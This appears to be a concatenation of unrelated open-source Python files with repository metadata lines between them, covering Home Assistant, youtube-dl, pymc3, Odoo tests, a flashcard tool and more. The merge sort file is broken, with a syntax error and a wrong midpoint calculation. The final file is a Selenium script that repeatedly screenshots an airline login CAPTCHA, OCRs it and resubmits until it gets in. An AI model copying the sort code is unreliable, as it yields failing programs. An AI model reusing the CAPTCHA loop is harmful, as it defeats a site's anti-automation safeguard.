def tag_manager_macs(self):
"""Return list of tag managers mac addresses in user account."""
return self.api.mac_addresses
def load_tags(self):
"""Load tags from remote server."""
self.tags = self.api.load_tags()
return self.tags
def arm(self, switch):
"""Arm entity sensor monitoring."""
func_name = f"arm_{switch.sensor_type}"
arm_func = getattr(self.api, func_name)
if arm_func is not None:
arm_func(switch.tag_id, switch.tag_manager_mac)
def disarm(self, switch):
"""Disarm entity sensor monitoring."""
func_name = f"disarm_{switch.sensor_type}"
disarm_func = getattr(self.api, func_name)
if disarm_func is not None:
disarm_func(switch.tag_id, switch.tag_manager_mac)
def make_notifications(self, binary_sensors, mac):
"""Create configurations for push notifications."""
_LOGGER.info("Creating configurations for push notifications.")
configs = []
bi_url = self.binary_event_callback_url
for bi_sensor in binary_sensors:
configs.extend(bi_sensor.event.build_notifications(bi_url, mac))
update_url = self.update_callback_url
update_config = NC.make_config_for_update_event(update_url, mac)
configs.append(update_config)
return configs
def install_push_notifications(self, binary_sensors):
"""Register local push notification from tag manager."""
_LOGGER.info("Registering local push notifications.")
for mac in self.tag_manager_macs:
configs = self.make_notifications(binary_sensors, mac)
# install notifications for all tags in tag manager
# specified by mac
result = self.api.install_push_notification(0, configs, True, mac)
if not result:
self.hass.components.persistent_notification.create(
"Error: failed to install local push notifications <br />",
title="Wireless Sensor Tag Setup Local Push Notifications",
notification_id="wirelesstag_failed_push_notification",
)
else:
_LOGGER.info(
"Installed push notifications for all\
tags in %s.",
mac,
)
@property
def local_base_url(self):
"""Define base url of hass in local network."""
if self._local_base_url is None:
self._local_base_url = "http://{}".format(util.get_local_ip())
port = self.hass.config.api.port
if port is not None:
self._local_base_url += f":{port}"
return self._local_base_url
@property
def update_callback_url(self):
"""Return url for local push notifications(update event)."""
return f"{self.local_base_url}/api/events/wirelesstag_update_tags"
@property
def binary_event_callback_url(self):
"""Return url for local push notifications(binary event)."""
return f"{self.local_base_url}/api/events/wirelesstag_binary_event"
def handle_update_tags_event(self, event):
"""Handle push event from wireless tag manager."""
_LOGGER.info("push notification for update arrived: %s", event)
try:
tag_id = event.data.get("id")
mac = event.data.get("mac")
dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event)
except Exception as ex: # pylint: disable=broad-except
_LOGGER.error(
"Unable to handle tag update event:\
%s error: %s",
str(event),
str(ex),
)
def handle_binary_event(self, event):
"""Handle push notifications for binary (on/off) events."""
_LOGGER.info("Push notification for binary event arrived: %s", event)
try:
tag_id = event.data.get("id")
event_type = event.data.get("type")
mac = event.data.get("mac")
dispatcher_send(
self.hass,
SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac),
event,
)
except Exception as ex: # pylint: disable=broad-except
_LOGGER.error(
"Unable to handle tag binary event:\
%s error: %s",
str(event),
str(ex),
)
def setup(hass, config):
"""Set up the Wireless Sensor Tag component."""
conf = config[DOMAIN]
username = conf.get(CONF_USERNAME)
password = conf.get(CONF_PASSWORD)
try:
from wirelesstagpy import WirelessTags, WirelessTagsException
wirelesstags = WirelessTags(username=username, password=password)
platform = WirelessTagPlatform(hass, wirelesstags)
platform.load_tags()
hass.data[DOMAIN] = platform
except (ConnectTimeout, HTTPError, WirelessTagsException) as ex:
_LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex))
hass.components.persistent_notification.create(
"Error: {}<br />" "Please restart hass after fixing this." "".format(ex),
title=NOTIFICATION_TITLE,
notification_id=NOTIFICATION_ID,
)
return False
# listen to custom events
hass.bus.listen(
"wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event
)
hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event)
return True
class WirelessTagBaseSensor(Entity):
"""Base class for HA implementation for Wireless Sensor Tag."""
def __init__(self, api, tag):
"""Initialize a base sensor for Wireless Sensor Tag platform."""
self._api = api
self._tag = tag
self._uuid = self._tag.uuid
self.tag_id = self._tag.tag_id
self.tag_manager_mac = self._tag.tag_manager_mac
self._name = self._tag.name
self._state = None
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def principal_value(self):
"""Return base value.
Subclasses need override based on type of sensor.
"""
return 0
def updated_state_value(self):
"""Return formatted value.
The default implementation formats principal value.
"""
return self.decorate_value(self.principal_value)
# pylint: disable=no-self-use
def decorate_value(self, value):
"""Decorate input value to be well presented for end user."""
return f"{value:.1f}"
@property
def available(self):
"""Return True if entity is available."""
return self._tag.is_alive
def update(self):
"""Update state."""
if not self.should_poll:
return
updated_tags = self._api.load_tags()
updated_tag = updated_tags[self._uuid]
if updated_tag is None:
_LOGGER.error('Unable to update tag: "%s"', self.name)
return
self._tag = updated_tag
self._state = self.updated_state_value()
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {
ATTR_BATTERY_LEVEL: int(self._tag.battery_remaining * 100),
ATTR_VOLTAGE: f"{self._tag.battery_volts:.2f}V",
ATTR_TAG_SIGNAL_STRENGTH: f"{self._tag.signal_strength}dBm",
ATTR_TAG_OUT_OF_RANGE: not self._tag.is_in_range,
ATTR_TAG_POWER_CONSUMPTION: f"{self._tag.power_consumption:.2f}%",
}
|
leppa/home-assistant
|
homeassistant/components/wirelesstag/__init__.py
|
Python
|
apache-2.0
| 9,650
| 0.000415
|
'''
Python program for implementation of Merge Sort
l is left index, m is middle index and r is right index
L[l...m] and R[m+1.....r] are respective left and right sub-arrays
'''
def merge(arr, l, m, r):
n1 = m - l + 1
n2 = r-m
#create temporary arrays
L = [0]*(n1)
R = [0]*(n2)
#Copy data to temp arrays L[] and R[]
for i in range(0, n1):
L[i] = arr[l + i]
for j in range(0, n2):
R[j] = arr[m+1+j]
# Merge the temp array back into arr[l...r]
i = 0 # Initial index of first subarray
j = 0 # Initial index of second subarray
k = l # Initial index of merged subarray
#Comparing the elements of the array and filling them into one array
while i < n1 and j < n2 :
if L[i] <= R[j] :
arr[k] = L[i]
i += 1
else:
arr[k] = R[j]
j += 1
k += 1
# Copy the remaining element of L[], if there are any
while i < n1:
arr[k] = L[i]
i += 1
k += 1
# Copy the remaining element of R[], if there are any
while j < n2:
arr[k] R[j]
j += 1
k += 1
# l is for left index and r is for right index of the
# subarray of arr to be sorted
def mergeSort(arr, l, r):
if l < r:
#Same as (l+r)/2, but avoid overflow for large l and h
m = (l+(r-1))/2
# Sort first and second halves
mergeSort(arr, l, m)
mergeSort(arr, m+1, r)
merge(arr, l, m, r)
|
tannmay/Algorithms-1
|
Sorting/Codes/mergeSort.py
|
Python
|
gpl-3.0
| 1,313
| 0.007616
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
_TESTS = [{
'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'md5:7dcdab3b2d17e5217c953256af964e9c',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
if video_type == 'lf':
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
formats.append({
'format_id': format_id,
'url': asset_url,
'ext': ext,
})
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
|
israeltobias/DownMedia
|
youtube-dl/youtube_dl/extractor/go.py
|
Python
|
gpl-3.0
| 6,104
| 0.002457
|
#!/usr/bin/env python3
# Review Lines from the Selected Deck in Random Order Until All Pass
# Written in 2012 by 伴上段
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
from argparse import *
from csv import *
from datetime import *
from os.path import *
from random import *
from sys import *
def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2):
ret = 0
if isinstance(deckfile, str) and not exists(deckfile):
stderr.write("deck file does not exist: " + deckfile + "\n")
ret = 1
if not exists(logfile):
stderr.write("log file does not exist: " + logfile + "\n")
ret = 1
if not exists(commandfile):
stderr.write("command file (pipe?) does not exist: " + commandfile + "\n")
ret = 1
if ret != 0:
return 1;
reviewing_cards = []
failed_cards = []
deckf = None
try:
deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile)
for fields in reader(deckf, delimiter=field_sep):
if len(fields) != 0:
reviewing_cards.append([fields[0], field_sep.join(fields), False])
finally:
if deckf is not None:
deckf.close()
def logreview(logf, card, command):
logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command)
sm2_commands = set(str(v) + "\n" for v in range(6))
shuffle(reviewing_cards)
with open(commandfile, 'r') as commandf:
with open(logfile, 'a') as logf:
while reviewing_cards or failed_cards:
if not reviewing_cards:
reviewing_cards, failed_cards = failed_cards, reviewing_cards
shuffle(reviewing_cards)
card = reviewing_cards.pop()
stdout.write(card[1] + "\n")
stdout.flush()
command = commandf.readline()
if use_sm2:
if command in sm2_commands:
if not (is_dry_run or card[-1]):
logreview(logf, card, command)
if int(command[0:1]) < 3:
card[-1] = True
failed_cards.append(card)
elif command == "q\n":
return 0
else:
stderr.write("unrecognized command: " + command + "\n")
return 2
else:
# Leitner system
if command == "+\n":
if not (is_dry_run or card[-1]):
logreview(logf, card, "+\n")
elif command == "-\n":
if not is_dry_run:
logreview(logf, card, "-\n")
card[-1] = True
failed_cards.append(card)
elif command.lower() == "q\n":
return 0
else:
stderr.write("unrecognized command: " + command + "\n")
return 2
logf.flush()
return 0
if __name__ == "__main__":
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards
and log the results. Both standard input and the specified log file must be
CSV files with the same field separator character, which is specified via -s.
This program works with either the Leitner system or the SuperMemo algorithm,
version 2 (SM-2).
formatting:
This program treats the first field of each nonempty line from the deck as
that line's unique ID; otherwise, this program is agnostic about formatting.
New log file entries will have this format:
<ID> <field-separator> <timestamp> <field-separator> <result>
where <ID> is the unique ID of the line (card) associated with the record,
<field-separator> is the CSV field separator, <timestamp> is the record's
timestamp (you can modify its format via the -f option), and <result> is the
result of the review.
For Leitner-system-based reviews, <result> is either '+' or '-'.
'+' indicates that the user passed the review at the specified time, whereas
'-' indicates that the user failed at the specified time.
For SM-2-based reviews, <result> is an integer in the range [0,5] indicating
the "quality of review response" that the user provided. (0 indicates a
complete memory blackout whereas 5 means the review was a piece of cake.)
output:
This program shuffles lines and prints them to standard output one at a time
in CSV format. After printing a card, this program will wait for a command
from the specified command file. Commands are single-word lines
terminated by standard newline (\\n) characters. For Leitner-system-based
reviews, the commands are:
+ the user passed the card
- the user didn't pass the card
q the user is terminating the quiz
For SM-2-based reviews, the commands are:
0 quality of review response 0
1 quality of review response 1
2 quality of review response 2
3 quality of review response 3
4 quality of review response 4
5 quality of review response 5
q the user is terminating the quiz
All other values are erroneous.""")
parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review")
parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)")
parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)")
parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system")
parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands")
parser.add_argument("logfile", help="a CSV-formatted file containing records for the deck's lines")
args = parser.parse_args()
try:
ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2)
except KeyboardInterrupt:
ret = 0
exit(ret)
|
jtvaughan/oboeta
|
oboeta.py
|
Python
|
cc0-1.0
| 6,217
| 0.009356
|
from pymc3 import *
import theano.tensor as t
from theano.tensor.nlinalg import matrix_inverse as inv
from numpy import array, diag, linspace
from numpy.random import multivariate_normal
# Generate some multivariate normal data:
n_obs = 1000
# Mean values:
mu = linspace(0, 2, num=4)
n_var = len(mu)
# Standard deviations:
stds = np.ones(4) / 2.0
# Correlation matrix of 4 variables:
corr = array([[ 1. , 0.75, 0. , 0.15],
[ 0.75, 1. , -0.06, 0.19],
[ 0. , -0.06, 1. , -0.04],
[ 0.15, 0.19, -0.04, 1. ]])
cov_matrix = diag(stds).dot(corr.dot(diag(stds)))
dataset = multivariate_normal(mu, cov_matrix, size=n_obs)
# In order to convert the upper triangular correlation values to a complete
# correlation matrix, we need to construct an index matrix:
n_elem = n_var * (n_var - 1) / 2
tri_index = np.zeros([n_var, n_var], dtype=int)
tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem)
tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem)
with Model() as model:
mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var)
# We can specify separate priors for sigma and the correlation matrix:
sigma = Uniform('sigma', shape=n_var)
corr_triangle = LKJCorr('corr', n=1, p=n_var)
corr_matrix = corr_triangle[tri_index]
corr_matrix = t.fill_diagonal(corr_matrix, 1)
cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma)))
like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset)
def run(n=1000):
if n == "short":
n = 50
with model:
start = find_MAP()
step = NUTS(scaling=start)
tr = sample(n, step=step, start=start)
if __name__ == '__main__':
run()
|
MCGallaspy/pymc3
|
pymc3/examples/LKJ_correlation.py
|
Python
|
apache-2.0
| 1,729
| 0.00694
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: vraj@reciprocitylabs.com
# Maintained By: vraj@reciprocitylabs.com
"""Defines a Revision model for storing snapshots."""
from ggrc import db
from ggrc.models.computed_property import computed_property
from ggrc.models.mixins import Base
from ggrc.models.types import JsonType
class Revision(Base, db.Model):
"""Revision object holds a JSON snapshot of the object at a time."""
__tablename__ = 'revisions'
resource_id = db.Column(db.Integer, nullable=False)
resource_type = db.Column(db.String, nullable=False)
event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False)
action = db.Column(db.Enum(u'created', u'modified', u'deleted'),
nullable=False)
content = db.Column(JsonType, nullable=False)
source_type = db.Column(db.String, nullable=True)
source_id = db.Column(db.Integer, nullable=True)
destination_type = db.Column(db.String, nullable=True)
destination_id = db.Column(db.Integer, nullable=True)
@staticmethod
def _extra_table_args(_):
return (db.Index('revisions_modified_by', 'modified_by_id'),)
_publish_attrs = [
'resource_id',
'resource_type',
'source_type',
'source_id',
'destination_type',
'destination_id',
'action',
'content',
'description',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Revision, cls).eager_query()
return query.options(
orm.subqueryload('modified_by'),
orm.subqueryload('event'), # used in description
)
def __init__(self, obj, modified_by_id, action, content):
self.resource_id = obj.id
self.modified_by_id = modified_by_id
self.resource_type = str(obj.__class__.__name__)
self.action = action
self.content = content
for attr in ["source_type",
"source_id",
"destination_type",
"destination_id"]:
setattr(self, attr, getattr(obj, attr, None))
def _description_mapping(self, link_objects):
"""Compute description for revisions with <-> in display name."""
display_name = self.content['display_name']
source, destination = display_name.split('<->')[:2]
mapping_verb = "linked" if self.resource_type in link_objects else "mapped"
if self.action == 'created':
result = u"{1} {2} to {0}".format(source, destination, mapping_verb)
elif self.action == 'deleted':
result = u"{1} un{2} from {0}".format(source, destination, mapping_verb)
else:
result = u"{0} {1}".format(display_name, self.action)
return result
@computed_property
def description(self):
"""Compute a human readable description from action and content."""
link_objects = ['ObjectDocument']
if 'display_name' not in self.content:
return ''
display_name = self.content['display_name']
if not display_name:
result = u"{0} {1}".format(self.resource_type, self.action)
elif u'<->' in display_name:
result = self._description_mapping(link_objects)
else:
if 'mapped_directive' in self.content:
# then this is a special case of combined map/creation
# should happen only for Section and Control
mapped_directive = self.content['mapped_directive']
if self.action == 'created':
result = u"New {0}, {1}, created and mapped to {2}".format(
self.resource_type,
display_name,
mapped_directive
)
elif self.action == 'deleted':
result = u"{0} unmapped from {1} and deleted".format(
display_name, mapped_directive)
else:
result = u"{0} {1}".format(display_name, self.action)
else:
# otherwise, it's a normal creation event
result = u"{0} {1}".format(display_name, self.action)
if self.event.action == "IMPORT":
result += ", via spreadsheet import"
return result
|
prasannav7/ggrc-core
|
src/ggrc/models/revision.py
|
Python
|
apache-2.0
| 4,093
| 0.008063
|
from .base import *
DEBUG = True
EMAIL_BACKEND = 'nr.sendmailemailbackend.EmailBackend'
|
shafiquejamal/socialassistanceregistry
|
nr/nr/settings/testinserver.py
|
Python
|
bsd-3-clause
| 88
| 0.011364
|
# coding: utf-8
from google.appengine.ext import ndb
from flask.ext import restful
import flask
from api import helpers
import auth
import model
import util
from main import api_v1
###############################################################################
# Admin
###############################################################################
@api_v1.resource('/admin/song/', endpoint='api.admin.song.list')
class AdminSongListAPI(restful.Resource):
@auth.admin_required
def get(self):
song_keys = util.param('song_keys', list)
if song_keys:
song_db_keys = [ndb.Key(urlsafe=k) for k in song_keys]
song_dbs = ndb.get_multi(song_db_keys)
return helpers.make_response(song_dbs, model.song.FIELDS)
song_dbs, song_cursor = model.Song.get_dbs()
return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor)
@api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song')
class AdminSongAPI(restful.Resource):
@auth.admin_required
def get(self, song_key):
song_db = ndb.Key(urlsafe=song_key).get()
if not song_db:
helpers.make_not_found_exception('song %s not found' % song_key)
return helpers.make_response(song_db, model.Song.FIELDS)
|
lipis/the-smallest-creature
|
main/api/v1/song.py
|
Python
|
mit
| 1,226
| 0.006525
|
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import os
import mock
from odoo.modules import get_module_path
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
from odoo.addons.module_auto_update.addon_hash import addon_hash
from ..models.module_deprecated import PARAM_DEPRECATED
model = 'odoo.addons.module_auto_update.models.module'
class EndTestException(Exception):
pass
class TestModule(TransactionCase):
def setUp(self):
super(TestModule, self).setUp()
module_name = 'module_auto_update'
self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1")
self.own_module = self.env['ir.module.module'].search([
('name', '=', module_name),
])
self.own_dir_path = get_module_path(module_name)
keep_langs = self.env['res.lang'].search([]).mapped('code')
self.own_checksum = addon_hash(
self.own_dir_path,
exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'],
keep_langs=keep_langs,
)
self.own_writeable = os.access(self.own_dir_path, os.W_OK)
@mock.patch('%s.get_module_path' % model)
def create_test_module(self, vals, get_module_path_mock):
get_module_path_mock.return_value = self.own_dir_path
test_module = self.env['ir.module.module'].create(vals)
return test_module
def test_store_checksum_installed_state_installed(self):
"""It should set the module's checksum_installed equal to
checksum_dir when vals contain a ``latest_version`` str."""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({'latest_version': '1.0'})
self.assertEqual(
self.own_module.checksum_installed, self.own_module.checksum_dir,
)
def test_store_checksum_installed_state_uninstalled(self):
"""It should clear the module's checksum_installed when vals
contain ``"latest_version": False``"""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({'latest_version': False})
self.assertIs(self.own_module.checksum_installed, False)
def test_store_checksum_installed_vals_contain_checksum_installed(self):
"""It should not set checksum_installed to False or checksum_dir when
a checksum_installed is included in vals"""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({
'state': 'installed',
'checksum_installed': 'test',
})
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Providing checksum_installed in vals did not prevent overwrite',
)
def test_store_checksum_installed_with_retain_context(self):
"""It should not set checksum_installed to False or checksum_dir when
self has context retain_checksum_installed=True"""
self.own_module.checksum_installed = 'test'
self.own_module.with_context(
retain_checksum_installed=True,
)._store_checksum_installed({'state': 'installed'})
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Providing retain_checksum_installed context did not prevent '
'overwrite',
)
@mock.patch('%s.get_module_path' % model)
def test_button_uninstall_no_recompute(self, module_path_mock):
"""It should not attempt update on `button_uninstall`."""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
test_module = self.create_test_module(vals)
test_module.checksum_installed = 'test'
uninstall_module = self.env['ir.module.module'].search([
('name', '=', 'web'),
])
uninstall_module.button_uninstall()
self.assertNotEqual(
test_module.state, 'to upgrade',
'Auto update logic was triggered during uninstall.',
)
def test_button_immediate_uninstall_no_recompute(self):
"""It should not attempt update on `button_immediate_uninstall`."""
uninstall_module = self.env['ir.module.module'].search([
('name', '=', 'web'),
])
try:
mk = mock.MagicMock()
uninstall_module._patch_method('button_uninstall', mk)
mk.side_effect = EndTestException
with self.assertRaises(EndTestException):
uninstall_module.button_immediate_uninstall()
finally:
uninstall_module._revert_method('button_uninstall')
def test_button_uninstall_cancel(self):
"""It should preserve checksum_installed when cancelling uninstall"""
self.own_module.write({'state': 'to remove'})
self.own_module.checksum_installed = 'test'
self.own_module.button_uninstall_cancel()
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Uninstall cancellation does not preserve checksum_installed',
)
def test_button_upgrade_cancel(self):
"""It should preserve checksum_installed when cancelling upgrades"""
self.own_module.write({'state': 'to upgrade'})
self.own_module.checksum_installed = 'test'
self.own_module.button_upgrade_cancel()
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Upgrade cancellation does not preserve checksum_installed',
)
def test_create(self):
"""It should call _store_checksum_installed method"""
_store_checksum_installed_mock = mock.MagicMock()
try:
self.env['ir.module.module']._patch_method(
'_store_checksum_installed',
_store_checksum_installed_mock,
)
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
self.create_test_module(vals)
_store_checksum_installed_mock.assert_called_once_with(vals)
finally:
self.env['ir.module.module']._revert_method(
'_store_checksum_installed',
)
@mute_logger("openerp.modules.module")
@mock.patch('%s.get_module_path' % model)
def test_get_module_list(self, module_path_mock):
"""It should change the state of modules with different
checksum_dir and checksum_installed to 'to upgrade'"""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
test_module = self.create_test_module(vals)
test_module.checksum_installed = 'test'
self.env['base.module.upgrade'].get_module_list()
self.assertEqual(
test_module.state, 'to upgrade',
'List update does not mark upgradeable modules "to upgrade"',
)
@mock.patch('%s.get_module_path' % model)
def test_get_module_list_only_changes_installed(self, module_path_mock):
"""It should not change the state of a module with a former state
other than 'installed' to 'to upgrade'"""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'uninstalled',
}
test_module = self.create_test_module(vals)
self.env['base.module.upgrade'].get_module_list()
self.assertNotEqual(
test_module.state, 'to upgrade',
'List update changed state of an uninstalled module',
)
def test_write(self):
"""It should call _store_checksum_installed method"""
_store_checksum_installed_mock = mock.MagicMock()
self.env['ir.module.module']._patch_method(
'_store_checksum_installed',
_store_checksum_installed_mock,
)
vals = {'state': 'installed'}
self.own_module.write(vals)
_store_checksum_installed_mock.assert_called_once_with(vals)
self.env['ir.module.module']._revert_method(
'_store_checksum_installed',
)
|
ovnicraft/server-tools
|
module_auto_update/tests/test_module_deprecated.py
|
Python
|
agpl-3.0
| 8,365
| 0
|
import json
import click
from tabulate import tabulate
@click.command('notes', short_help='List notes')
@click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)')
@click.pass_obj
def cli(obj, alert_id):
"""List notes."""
client = obj['client']
if alert_id:
if obj['output'] == 'json':
r = client.http.get('/alert/{}/notes'.format(alert_id))
click.echo(json.dumps(r['notes'], sort_keys=True, indent=4, ensure_ascii=False))
else:
timezone = obj['timezone']
headers = {
'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE', 'attributes': 'ATTRIBUTES',
'createTime': 'CREATED', 'updateTime': 'UPDATED', 'related': 'RELATED ID', 'customer': 'CUSTOMER'
}
click.echo(tabulate([n.tabular(timezone) for n in client.get_alert_notes(alert_id)], headers=headers, tablefmt=obj['output']))
else:
raise click.UsageError('Need "--alert-id" to list notes.')
|
alerta/python-alerta
|
alertaclient/commands/cmd_notes.py
|
Python
|
mit
| 1,034
| 0.004836
|
# -*- coding: utf-8 -*-
# python+selenium识别验证码
#
import re
import requests
import pytesseract
from selenium import webdriver
from PIL import Image,Image
import time
#
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://higo.flycua.com/hp/html/login.html")
driver.implicitly_wait(30)
# 下面用户名和密码涉及到我个人信息,所以隐藏
driver.find_element_by_name('memberId').send_keys('xxxxxx')
driver.find_element_by_name('password').send_keys('xxxxxx')
# 因为验证码不能一次就正确识别,我加了循环,一直识别,直到登录成功
while True:
# 清空验证码输入框,因为可能已经识别过一次了,里面有之前识别的错的验证码
driver.find_element_by_name("verificationCode").clear()
# 截图或验证码图片保存地址
screenImg = "H:\screenImg.png"
# 浏览器页面截屏
driver.get_screenshot_as_file(screenImg)
# 定位验证码位置及大小
location = driver.find_element_by_name('authImage').location
size = driver.find_element_by_name('authImage').size
# 下面四行我都在后面加了数字,理论上是不用加的,但是不加我这截的不是验证码那一块的图,可以看保存的截图,根据截图修改截图位置
left = location['x'] + 530
top = location['y'] + 175
right = location['x'] + size['width'] + 553
bottom = location['y'] + size['height'] + 200
# 从文件读取截图,截取验证码位置再次保存
img = Image.open(screenImg).crop((left, top, right, bottom))
# 下面对图片做了一些处理,能更好识别一些,相关处理再百度看吧
img = img.convert('RGBA') # 转换模式:L | RGB
img = img.convert('L') # 转换模式:L | RGB
img = Image.Contrast(img) # 增强对比度
img = img.enhance(2.0) # 增加饱和度
img.save(screenImg)
# 再次读取识别验证码
img = Image.open(screenImg)
code = pytesseract.image_to_string(img)
# 打印识别的验证码
# print(code.strip())
# 识别出来验证码去特殊符号,用到了正则表达式,这是我第一次用,之前也没研究过,所以用的可能粗糙,请见谅
b = ''
for i in code.strip():
pattern = re.compile(r'[a-zA-Z0-9]')
m = pattern.search(i)
if m != None:
b += i
# 输出去特殊符号以后的验证码
print(b)
# 把b的值输入验证码输入框
driver.find_element_by_name("verificationCode").send_keys(b)
# 点击登录按钮
driver.find_element_by_class_name('login-form-btn-submit').click()
